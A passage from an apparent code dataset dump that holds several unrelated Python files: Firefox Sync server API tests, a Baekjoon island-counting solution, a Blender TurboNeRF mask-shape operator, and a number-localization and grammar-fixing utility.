collection_counts[p.user_name][cn] = curr_count\n expected_count_all += curr_count\n\n # Generate a bunch of random-content WBOs\n base_url = '/sync/1.0/%s/storage/%s' % (p.user_name, cn)\n for i in range(curr_count):\n resp = self.put_random_wbo(base_url, auth_header)\n\n # Ensure the total number of WBOs is correct.\n result_count_all = WBO.all().count()\n self.assertEqual(expected_count_all, result_count_all)\n\n # Ensure the counts for each profile collection matches inserts.\n for profile in profiles:\n counts = Collection.get_counts(profile)\n for name in collection_names:\n c = Collection.get_by_profile_and_name(profile, name)\n self.assertEqual(\n collection_counts[profile.user_name][name],\n WBO.get_by_collection(c).count()\n )\n\n # Delete each of the collections for each user.\n for profile in profiles:\n auth_header = self.build_auth_header(\n profile.user_name, profile.password\n )\n for name in collection_names:\n url = '/sync/1.0/%s/storage/%s' % (profile.user_name, name)\n resp = self.app.delete(url, headers=auth_header)\n # Ensure the individual collection is now empty.\n c = Collection.get_by_profile_and_name(profile, name)\n self.assertEqual(0, WBO.get_by_collection(c).count())\n\n # Ensure there are no more WBOs\n result_count_all = WBO.all().count()\n self.assertEqual(0, result_count_all)\n\n 
def test_retrieval_by_id(self):\n \"\"\"Exercise collection retrieval with a single ID\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbo_id = '1234'\n\n w = WBO(wbo_id=wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), sortindex=1000, \n payload='payload-%s' % wbo_id, payload_size=9)\n w.put()\n\n url = '/sync/1.0/%s/storage/%s?id=%s' % (\n p.user_name, c.name, w.wbo_id\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n self.log.debug('RESPONSE %s' % resp.body)\n self.assertEqual(w.wbo_id, result_data[0])\n\n url = '/sync/1.0/%s/storage/%s?id=%s&full=1' % (\n p.user_name, c.name, w.wbo_id\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n self.log.debug('RESPONSE %s' % resp.body)\n self.assertEqual(w.payload, result_data[0]['payload'])\n\n def test_deletion_by_multiple_ids(self):\n \"\"\"Exercise bulk deletion with a set of IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n wbo_ids = [w.wbo_id for w in wbos]\n to_delete_ids = wbo_ids[0:len(wbo_ids)/2]\n \n url = '/sync/1.0/%s/storage/%s?ids=%s' % (\n p.user_name, c.name, ','.join(to_delete_ids)\n )\n\n resp = self.app.delete(url, headers=ah)\n self.assertEqual('200 OK', resp.status)\n self.assert_(WBO.get_time_now() >= float(resp.body))\n\n result_ids = [w.wbo_id for w in WBO.all()]\n for wbo_id in to_delete_ids:\n self.assert_(wbo_id not in result_ids)\n\n def test_retrieval_by_multiple_ids(self):\n \"\"\"Exercise collection retrieval with multiple IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbos = [ \n WBO(wbo_id='%s' % wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), sortindex=1000, payload='payload-%s' %\n wbo_id, payload_size=9\n ) for wbo_id in range(10) ]\n\n for w in wbos: w.put()\n\n wbo_ids = [w.wbo_id for w in wbos]\n\n url = '/sync/1.0/%s/storage/%s?ids=%s' % (\n p.user_name, c.name, ','.join(wbo_ids)\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n wbo_ids.sort()\n result_data.sort()\n self.assertEqual(wbo_ids, result_data)\n self.assertEqual(len(wbo_ids), int(resp.headers['X-Weave-Records']))\n\n url = '/sync/1.0/%s/storage/%s?ids=%s&full=1' % (\n p.user_name, c.name, ','.join(wbo_ids)\n )\n\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n result_data.sort(lambda a,b: cmp(a['id'], b['id']))\n for idx in range(len(wbos)):\n self.assertEqual(wbos[idx].payload, result_data[idx]['payload'])\n self.assertEqual(len(wbo_ids), int(resp.headers['X-Weave-Records']))\n\n def test_retrieval_by_index_above_and_below(self):\n \"\"\"Exercise collection retrieval on sortindex range\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n wbo_sortindexes = ( -100, -10, -1, 0, 1, 10, 23, 100, 999, 1000, 9999 )\n\n wbos = [ ]\n for idx in range(len(wbo_sortindexes)):\n sortindex = wbo_sortindexes[idx]\n wbo_id = '%s' % idx\n w = WBO(wbo_id=wbo_id, parent=c, collection=c,\n modified=WBO.get_time_now(), \n sortindex=sortindex, \n payload='payload-%s' % wbo_id, payload_size=9)\n w.put()\n self.log.debug(\"WBO %s\" % simplejson.dumps(w.to_dict()))\n wbos.append(w)\n\n # TODO: Try a variety of ranges here?\n (index_above, index_below) = (-10, 1000)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if index_above < w.sortindex and w.sortindex < index_below\n ]\n\n url = '/sync/1.0/%s/storage/%s?index_above=%s&index_below=%s' % (\n 
p.user_name, c.name, index_above, index_below\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_newer_and_older(self):\n \"\"\"Exercise collection retrieval by modified timestamp range\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n # TODO: Try a variety of ranges here?\n (newer, older) = (wbos[2].modified, wbos[len(wbos)-2].modified)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if newer < w.modified\n ]\n\n url = '/sync/1.0/%s/storage/%s?newer=%s' % (\n p.user_name, c.name, newer\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n expected_ids = [\n w.wbo_id for w in wbos\n if newer < w.modified and w.modified < older\n ]\n\n url = '/sync/1.0/%s/storage/%s?newer=%s&older=%s' % (\n p.user_name, c.name, newer, older\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_parent_and_predecessor(self):\n \"\"\"Exercise collection retrieval by parent and predecessor IDs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n id_sets = dict([\n (kind, set([ getattr(w, kind) for w in wbos ]))\n for kind in ('parentid', 'predecessorid')\n ])\n\n for kind, p_ids in id_sets.items():\n for p_id in set(p_ids):\n\n expected_ids = [\n w.wbo_id for w in wbos\n if getattr(w, kind) == p_id\n ]\n\n url = '/sync/1.0/%s/storage/%s?%s=%s' % (\n p.user_name, c.name, kind, p_id\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n expected_ids.sort()\n result_data.sort()\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_with_sort(self):\n \"\"\"Exercise collection retrieval with sort options\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n\n sorts = {\n 'oldest': lambda a,b: cmp(a.modified, b.modified),\n 'newest': lambda a,b: cmp(b.modified, a.modified),\n 'index': lambda a,b: cmp(b.sortindex, a.sortindex),\n }\n\n for sort_option, sort_fn in sorts.items():\n wbos.sort(sort_fn)\n expected_ids = [ w.wbo_id for w in wbos ]\n\n url = '/sync/1.0/%s/storage/%s?sort=%s' % (\n p.user_name, c.name, sort_option\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_with_limit_offset(self):\n \"\"\"Exercise collection retrieval 
with limit and offset\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n\n max_limit = len(wbos) / 2\n max_offset = len(wbos) / 2\n\n for c_limit in range(1, max_limit):\n for c_offset in range(1, max_offset):\n\n expected_ids = [ \n w.wbo_id for w in \n wbos[ (c_offset) : (c_offset+c_limit) ] \n ]\n\n url = '/sync/1.0/%s/storage/%s?limit=%s&offset=%s&sort=oldest' % (\n p.user_name, c.name, c_limit, c_offset\n )\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_retrieval_by_multiple_criteria(self):\n \"\"\"Exercise retrieval when using multiple criteria\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n # Criteria set for testing.\n index_above = 2\n index_below = 13\n parentid = 'a2'\n predecessorid = 'b3'\n\n expected_ids = []\n wbos.sort(lambda b,a: cmp(a.sortindex, b.sortindex))\n for w in wbos:\n if (index_above < w.sortindex and index_below > w.sortindex and\n parentid == w.parentid and predecessorid == w.predecessorid):\n expected_ids.append(w.wbo_id)\n \n # Build and run a retrieval query using all of the criteria.\n params = 'index_above=%s&index_below=%s&parentid=%s&predecessorid=%s' % (\n index_above, index_below, parentid, predecessorid\n )\n url = '/sync/1.0/%s/storage/%s?%s' % (p.user_name, c.name, params)\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"EXPECTED %s\" % simplejson.dumps(expected_ids))\n self.log.debug(\"RESULT %s\" % resp.body)\n self.assertEqual(expected_ids, result_data)\n\n def test_bulk_update(self):\n \"\"\"Exercise bulk collection update\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n auth_header = self.build_auth_header()\n storage_url = '/sync/1.0/%s/storage/%s' % (p.user_name, c.name)\n\n self.build_wbo_parents_and_predecessors()\n\n bulk_data = [\n { 'id': '' },\n { 'id': 'foo/bar', 'sortindex': 'abcd' },\n { 'id': 'a-1000', 'sortindex':-1000000000 },\n { 'id': 'a-1001', 'sortindex': 1000000000 },\n { 'id': 'a-1002', 'parentid': 'notfound' },\n { 'id': 'a-1003', 'predecessorid': 'notfound' },\n { 'id': 'a-1004', 'payload': 'invalid' },\n ]\n bulk_data.extend(self.wbo_values)\n\n self.log.debug(\"DATA %s\" % simplejson.dumps(bulk_data))\n\n resp = self.app.post(\n storage_url, headers=auth_header, \n params=simplejson.dumps(bulk_data)\n )\n self.assertEqual('200 OK', resp.status)\n result_data = simplejson.loads(resp.body)\n\n self.log.debug(\"RESULT %s\" % resp.body)\n\n self.assert_(WBO.get_time_now() >= float(result_data['modified']))\n\n expected_ids = [ w['id'] for w in self.wbo_values ]\n self.assertEqual(expected_ids, result_data['success'])\n \n expected_failures = {\n \"\": [\"invalid id\"], \n \"a-1004\": [\"payload needs to be json-encoded\"], \n \"a-1003\": [\"invalid predecessorid\"], \n \"a-1002\": [\"invalid parentid\"], \n \"a-1001\": [\"invalid sortindex\"], \n \"a-1000\": [\"invalid sortindex\"], \n \"foo/bar\": [\"invalid id\", \"invalid sortindex\"]\n }\n self.assertEqual(expected_failures, result_data['failed'])\n\n stored_ids = [ w.wbo_id for w in WBO.all() ]\n for wbo_id in expected_ids:\n self.assert_(wbo_id in stored_ids)\n\n def 
test_alternate_output_formats(self):\n \"\"\"Exercise alternate output formats\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n self.build_wbo_set()\n wbos = [ w for w in WBO.all() ]\n wbos.sort(lambda b,a: cmp(a.sortindex, b.sortindex))\n expected_ids = [ w.wbo_id for w in wbos ]\n\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n resp = self.app.get(url, headers=ah)\n result_data = simplejson.loads(resp.body)\n result_ids = [ x['id'] for x in result_data ]\n self.assertEqual(expected_ids, result_ids)\n\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n headers = { 'Accept': 'application/newlines' }\n headers.update(ah)\n resp = self.app.get(url, headers=headers)\n lines = resp.body.splitlines()\n for line in lines:\n data = simplejson.loads(line)\n self.assert_(data['id'] in expected_ids)\n\n if (False):\n url = '/sync/1.0/%s/storage/%s?full=1' % (p.user_name, c.name)\n headers = { 'Accept': 'application/whoisi' }\n headers.update(ah)\n resp = self.app.get(url, headers=headers)\n lines = \"\\n\".split(resp.body)\n\n self.log.debug(\"URL %s\" % url)\n self.log.debug(\"RESULT %s\" % resp.body)\n self.log.debug(\"RESULT2 %s\" % simplejson.dumps(lines))\n self.log.debug(\"LINES %s\" % len(lines))\n\n def test_cascading_profile_delete(self):\n \"\"\"Ensure that profile deletion cascades down to collections and WBOs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n self.assert_(WBO.all().count() > 0)\n self.assert_(Collection.all().count() > 0)\n self.assert_(Profile.all().count() > 0)\n\n p.delete()\n\n self.assertEquals(0, WBO.all().count())\n self.assertEquals(0, Collection.all().count())\n self.assertEquals(0, Profile.all().count())\n\n def test_cascading_collection_delete(self):\n \"\"\"Ensure that collection deletion cascades down to WBOs\"\"\"\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n wbos = self.build_wbo_set()\n\n count_all = WBO.all().count()\n collections = [c for c in Collection.all().ancestor(p)]\n for c in collections:\n c_count = len([x for x in c.retrieve()])\n c.delete()\n count_all -= c_count\n self.assertEqual(count_all, WBO.all().count())\n\n self.assertEqual(0, WBO.all().count())\n\n def test_header_if_unmodified_since(self):\n \"\"\"Ensure that X-If-Unmodified-Since header is honored in PUT / POST / DELETE\"\"\"\n self.fail(\"TODO\")\n\n def build_wbo_parents_and_predecessors(self):\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n id_sets = dict([\n (kind, set([ w[kind] for w in self.wbo_values ]))\n for kind in ('parentid', 'predecessorid')\n ])\n\n for kind, id_set in id_sets.items():\n for wbo_id in id_set:\n w = WBO(\n parent=c, collection=c,\n modified = WBO.get_time_now(), \n wbo_id = wbo_id, \n payload = simplejson.dumps({'random':'xxx'})\n )\n w.put()\n\n def build_wbo_set(self, num_wbos=15):\n (p, c, ah) = (self.profile, self.collection, self.auth_header)\n\n self.build_wbo_parents_and_predecessors()\n\n wbos = []\n for values in self.wbo_values:\n w = WBO(\n parent=c, collection=c,\n modified=WBO.get_time_now(), \n wbo_id = values['id'], \n parentid = values['parentid'],\n predecessorid = values['predecessorid'],\n sortindex = values['sortindex'], \n payload = values['payload']\n )\n w.put()\n wbos.append(w)\n time.sleep(0.1) # HACK: Delay to ensure modified stamps vary\n\n return wbos\n\n def put_random_wbo(self, url, auth_header):\n \"\"\"PUT a randomized WBO, given a base URL and auth header\"\"\"\n 
wbo_id = random.randint(0, 1000000)\n wbo_json = simplejson.dumps({\n 'sortindex': random.randint(0, 1000),\n 'payload': simplejson.dumps({\n 'random': ''.join(random.sample(string.letters, 16))\n })\n })\n return self.app.put(\n '%s/%s' % (url, wbo_id), \n headers=auth_header, \n params=wbo_json\n )\n\n def build_auth_header(self, user_name=None, passwd=None):\n \"\"\"Build an HTTP Basic Auth header from user name and password\"\"\"\n user_name = user_name or self.USER_NAME\n passwd = passwd or self.PASSWD\n return {\n 'Authorization': 'Basic %s' % base64.b64encode(\n '%s:%s' % (user_name, passwd)\n )\n }\n","repo_name":"lmorchard/firefox-sync-appengine","sub_path":"test/sync_api_tests.py","file_name":"sync_api_tests.py","file_ext":"py","file_size_in_byte":30101,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"52"} +{"seq_id":"12817122387","text":"import sys\n\ndef solution():\n global w, h, lands\n answer = 0\n v = [[0 for _ in range(w)] for _ in range(h)]\n\n for i in range(h):\n for j in range(w):\n if lands[i][j] != 0 and v[i][j] == 0:\n answer += 1\n stack = [(i, j)]\n v[i][j] = 1\n\n while stack:\n x, y = stack.pop()\n for k in range(8):\n new_x, new_y = x + dx[k], y + dy[k]\n if 0 <= new_x < h and 0 <= new_y < w:\n if v[new_x][new_y] == 0 and lands[new_x][new_y] != 0:\n stack.append((new_x, new_y))\n v[new_x][new_y] = 1\n\n print(answer)\n\n\ndx, dy = (-1, 1, 0, 0, -1, 1, -1, 1), (0, 0, -1 ,1, -1, -1, 1, 1)\nwhile True:\n w, h = map(int, sys.stdin.readline().strip().split(\" \"))\n if w == 0 and h == 0:\n break\n\n lands = []\n for i in range(h):\n lands.append(list(map(int, sys.stdin.readline().strip().split(\" \"))))\n\n solution()","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/백준_섬의_개수.py","file_name":"백준_섬의_개수.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73100218724","text":"import enum\nimport bpy\nfrom turbo_nerf.constants import (\n MASK_BOX_DIMS_ID,\n MASK_CYLINDER_HEIGHT_ID,\n MASK_CYLINDER_RADIUS_ID,\n MASK_FEATHER_ID,\n MASK_MODE_ID,\n MASK_OPACITY_ID,\n MASK_SPHERE_RADIUS_ID,\n MASK_TYPE_BOX,\n MASK_TYPE_CYLINDER,\n MASK_TYPE_ID,\n MASK_TYPE_SPHERE,\n OBJ_TYPE_ID,\n OBJ_TYPE_MASK_SHAPE,\n)\n\nfrom turbo_nerf.blender_utility.object_utility import add_cube, add_cylinder, add_empty, add_sphere, select_object\n\n# TODO: these should be in a different file\ndef lock_scale_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('scale')]\n for driver in drivers:\n driver.expression = \"1.0\"\n \ndef lock_location_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('location')]\n for driver in drivers:\n driver.expression = \"0.0\"\n\ndef lock_rotation_with_drivers(obj):\n drivers = [fc.driver for fc in obj.driver_add('rotation_euler')]\n for driver in drivers:\n driver.expression = \"0.0\"\n\n# Mask utils\n\ndef add_mask_specific_properties(mask_base, mask_type):\n if mask_type == MASK_TYPE_BOX:\n mask_base[MASK_BOX_DIMS_ID] = [2.0, 2.0, 2.0]\n props = mask_base.id_properties_ui(MASK_BOX_DIMS_ID)\n props.update(min=-1000.0, max=1000.0, soft_min=-100.0, soft_max=100.0, step=1, precision=3)\n\n elif mask_type == MASK_TYPE_CYLINDER:\n mask_base[MASK_CYLINDER_RADIUS_ID] = 1.0\n props = mask_base.id_properties_ui(MASK_CYLINDER_RADIUS_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n\n mask_base[MASK_CYLINDER_HEIGHT_ID] = 2.0\n 
props = mask_base.id_properties_ui(MASK_CYLINDER_HEIGHT_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n\n elif mask_type == MASK_TYPE_SPHERE:\n mask_base[MASK_SPHERE_RADIUS_ID] = 1.0\n props = mask_base.id_properties_ui(MASK_SPHERE_RADIUS_ID)\n props.update(min=0.0, max=1000.0, soft_min=0.0, soft_max=100.0, step=1, precision=3)\n else:\n raise ValueError(f\"Unknown mask type {mask_type}\")\n\ndef add_mask_box_drivers(mask_base, edge_obj, operator=\"+\"):\n drivers = [fc.driver for fc in edge_obj.driver_add('scale')]\n for idx, driver in enumerate(drivers):\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_d = driver.variables.new()\n var_d.name = \"dim\"\n var_d.targets[0].id = mask_base\n var_d.targets[0].data_path = f'[\"{MASK_BOX_DIMS_ID}\"][{idx}]'\n\n driver.expression = f\"max(0.0, (dim / 2.0) {operator} (0.5 * feather))\"\n\ndef add_mask_cylinder_drivers(mask_base, edge_obj, operator=\"+\"):\n [sx, sy, sz] = [fc.driver for fc in edge_obj.driver_add('scale')]\n for driver in [sx, sy, sz]:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n for driver in [sx, sy]:\n var_r = driver.variables.new()\n var_r.name = \"r\"\n var_r.targets[0].id = mask_base\n var_r.targets[0].data_path = f'[\"{MASK_CYLINDER_RADIUS_ID}\"]'\n\n sx.expression = sy.expression = f\"max(0.0, r {operator} 0.5 * feather)\"\n \n var_h = sz.variables.new()\n var_h.name = \"h\"\n var_h.targets[0].id = mask_base\n var_h.targets[0].data_path = f'[\"{MASK_CYLINDER_HEIGHT_ID}\"]'\n\n sz.expression = f\"max(0.0, (h / 2.0) {operator} 0.5 * feather)\"\n\ndef add_mask_sphere_drivers(mask_base, edge_obj, operator=\"+\"):\n drivers = [fc.driver for fc in edge_obj.driver_add('scale')]\n for driver in drivers:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_r = driver.variables.new()\n var_r.name = \"r\"\n var_r.targets[0].id = mask_base\n var_r.targets[0].data_path = f'[\"{MASK_SPHERE_RADIUS_ID}\"]'\n\n driver.expression = f\"max(0.0, r {operator} 0.5 * feather)\"\n\n# unused - for nondescript shapes that use scales for feathering instead of individual parameters\ndef add_mask_edge_scale_drivers(mask_base, visual_obj, operator=\"+\"):\n [sx, sy, sz] = [fc.driver for fc in visual_obj.driver_add('scale')]\n for driver in [sx, sy, sz]:\n var_f = driver.variables.new()\n var_f.name = \"feather\"\n var_f.targets[0].id = mask_base\n var_f.targets[0].data_path = f'[\"{MASK_FEATHER_ID}\"]'\n\n var_s = driver.variables.new()\n var_s.name = \"base_scale\"\n var_s.targets[0].id = mask_base\n var_s.targets[0].data_path = 'scale'\n \n sx.expression = f\"1.0 {operator} feather / base_scale[0]\"\n sy.expression = f\"1.0 {operator} feather / base_scale[1]\"\n sz.expression = f\"1.0 {operator} feather / base_scale[2]\"\n\nMASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR = {\n MASK_TYPE_BOX: add_cube,\n MASK_TYPE_CYLINDER: add_cylinder,\n MASK_TYPE_SPHERE: add_sphere,\n}\n\nMASK_TYPE_TO_DRIVER_ADDER = {\n MASK_TYPE_BOX: add_mask_box_drivers,\n MASK_TYPE_CYLINDER: add_mask_cylinder_drivers,\n MASK_TYPE_SPHERE: add_mask_sphere_drivers,\n}\n\nMASK_TYPE_TO_NICE_NAME = {\n MASK_TYPE_BOX: \"Box\",\n MASK_TYPE_CYLINDER: \"Cylinder\",\n MASK_TYPE_SPHERE: \"Sphere\",\n}\n\ndef 
add_mask_feathering_visualization(mask_base, mask_type):\n    if mask_type not in MASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR:\n        raise ValueError(f\"Unknown mask type {mask_type}\")\n    \n    constructor = MASK_TYPE_TO_PRIMITIVE_CONSTRUCTOR[mask_type]\n    driver_adder = MASK_TYPE_TO_DRIVER_ADDER[mask_type]\n    nice_name = MASK_TYPE_TO_NICE_NAME[mask_type]\n\n    outer_obj = constructor(name=f\"{nice_name} Mask Outer Boundary\")\n    outer_obj.parent = mask_base\n    outer_obj.display_type = \"WIRE\"\n    driver_adder(mask_base, outer_obj, operator=\"+\")\n    lock_location_with_drivers(outer_obj)\n    lock_rotation_with_drivers(outer_obj)\n\n    \n    inner_obj = constructor(name=f\"{nice_name} Mask Inner Boundary\")\n    inner_obj.parent = mask_base\n    inner_obj.display_type = \"WIRE\"\n    driver_adder(mask_base, inner_obj, operator=\"-\")\n    lock_location_with_drivers(inner_obj)\n    lock_rotation_with_drivers(inner_obj)\n\n\nclass BlenderNeRFAddMaskShapeOperator(bpy.types.Operator):\n    bl_idname = \"blender_nerf.add_mask_shape\"\n    bl_label = \"Add Mask Shape\"\n    bl_description = \"Add a mask shape\"\n    bl_options = {\"REGISTER\", \"UNDO\"}\n\n    def execute(self, context):\n        mask_type = context.scene.nerf_render_panel_settings.mask_shape\n        mask_base = add_empty(f\"{MASK_TYPE_TO_NICE_NAME[mask_type]} Mask Object\")\n        \n        mask_base[OBJ_TYPE_ID] = OBJ_TYPE_MASK_SHAPE\n        mask_base[MASK_TYPE_ID] = mask_type\n        mask_base[MASK_MODE_ID] = context.scene.nerf_render_panel_settings.mask_mode\n        mask_base[MASK_FEATHER_ID] = 0.0\n        mask_base[MASK_OPACITY_ID] = 1.0\n\n        add_mask_specific_properties(mask_base, mask_type)\n        \n        props = mask_base.id_properties_ui(MASK_FEATHER_ID)\n        props.update(min=0.0, max=128.0)\n\n        add_mask_feathering_visualization(mask_base, mask_type)\n        lock_scale_with_drivers(mask_base)\n\n        select_object(mask_base)\n\n        return {\"FINISHED\"}\n","repo_name":"JamesPerlman/TurboNeRF-Blender","sub_path":"panels/render_panel_operators/mask_shape_operators.py","file_name":"mask_shape_operators.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"52"} +{"seq_id":"33399549791","text":"import re\nfrom enum import Enum\nfrom utils import StringBuilder\n\nclass Locale(Enum):\n\tNorwegian = 1\n\tUS = 2\n\nclass NumberLocalization:\n\t\"\"\"\n\tLocale-specific formatting of numbers\n\t\"\"\"\n\tdef __init__(self, original: Locale, destination: Locale) -> None:\n\t\t\"\"\"Construct a NumberLocalization instance\n\t\toriginal -- The original locale\n\t\tdestination -- The destination locale\n\t\t\"\"\"\n\t\tself.original = original\n\t\tself.destination = destination\n\n\t\tif self.original == Locale.US:\n\t\t\tself.original_thousand_separator = \",\"\n\t\t\tself.original_decimal_separator = \".\"\n\t\t\t# Escape the dot so it matches a literal decimal point, not any character\n\t\t\tself.pattern = \"\\\\d+(,\\\\d{3})*(\\\\.\\\\d+)?\"\n\t\telse:\n\t\t\tself.original_thousand_separator = \".\"\n\t\t\tself.original_decimal_separator = \",\"\n\t\t\t# Escape the dot so it matches a literal thousand separator, not any character\n\t\t\tself.pattern = \"\\\\d+(\\\\.\\\\d{3})*(,\\\\d+)?\"\n\n\t\tif self.destination == Locale.US:\n\t\t\tself.destination_thousand_separator = \",\"\n\t\t\tself.destination_decimal_separator = \".\"\n\t\telse:\n\t\t\tself.destination_thousand_separator = \".\"\n\t\t\tself.destination_decimal_separator = \",\"\n\t\n\tdef findAllNumbers(self, text: str):\n\t\tfor i in re.finditer(self.pattern, text, re.S):\n\t\t\tprint(i)\n\n\tdef convert(self, text) -> str:\n\t\t\"\"\"\n\t\tFind and convert all the numbers\n\t\t\"\"\"\n\n\t\tsb = StringBuilder()\n\t\tcurr = 0\n\n\t\tfor i in re.finditer(self.pattern, text, re.S):\n\t\t\t# Append the 
previous text\n\t\t\tsb.append(text[curr: i.start()])\n\n\t\t\t# Formatting\n\t\t\ttemp_old = i.group(0)\n\t\t\tdecimal_separator_pos = temp_old.find(self.original_decimal_separator)\n\t\t\t\n\t\t\tif decimal_separator_pos >= 0:\n\t\t\t\ttemp_new = temp_old[0:decimal_separator_pos].replace(self.original_thousand_separator, self.destination_thousand_separator) + \\\n\t\t\t\t\tself.destination_decimal_separator + temp_old[decimal_separator_pos + 1:]\n\t\t\telse:\n\t\t\t\ttemp_new = temp_old.replace(self.original_thousand_separator, self.destination_thousand_separator)\n\n\t\t\tsb.append(temp_new) # Append the formatted number\n\t\t\tcurr = i.end() # Update curr\n\n\t\t# Append the left over text\n\t\tsb.append(text[curr:])\n\t\t\n\t\treturn sb\n\nclass MiniGrammarly:\n\tdata = [\t\t\n\t\t#(\"\\n\\n\", \"\\n\"), # Double newlines\n\t\t(\"[‘’“”❮❯‹›]|«\\s*|\\s*»\",\"\\\"\"), # Quotation Marks: Left+Right Single, L+R Double, L+R Pointing Double Angle, Heavy L+R Pointing Angle Quotation Mark Ornament, Single Left+Right Pointing Angle\n\t\t(\"(?i)covid\",\"COVID\"), # covid, Covid, coVID \n\t\t(\"(?i)v\\wc(\\s*|\\W)xin\",\"vaccine\"), # Vắc-xin, Vac-xin, vac xin, vắc xin, vacxin, vac xin, vắcxin\t\n\t\t(\"\\s*,\\s*(?!\\d)\", \", \"), # Hello , world. Hello , world. Hello ,world. Hello, world. Hello,world. 10,000\n\t\t(\"\\s{2,}\", \" \"), # Double spaces. Ex. Hello world.\n\t\t]\n\t\n\tdef check(self, instr: str):\n\t\t\"\"\"\n\t\tScan and correct grammar errors\n\t\t\n\t\tParams:\n\t\tinstr: str\n\t\t\tString to check\n\t\t\"\"\"\n\t\t# Dictionary\n\t\tfor a, b in self.data:\n\t\t\tinstr = re.sub(a, b, instr)\n\t\t\n\t\t# Number Localization\n\t\tnlc = NumberLocalization(Locale.Norwegian, Locale.US)\n\t\treturn nlc.convert(instr).__str__()\n\ndef test():\n\tin_str = \"Today, 10.000.999,22 nguoi chet vi covid-19 , du da chich vac xin 8.000,3 lieu\"\n\tf = MiniGrammarly()\n\tprint(f.check(in_str))\n\ndef 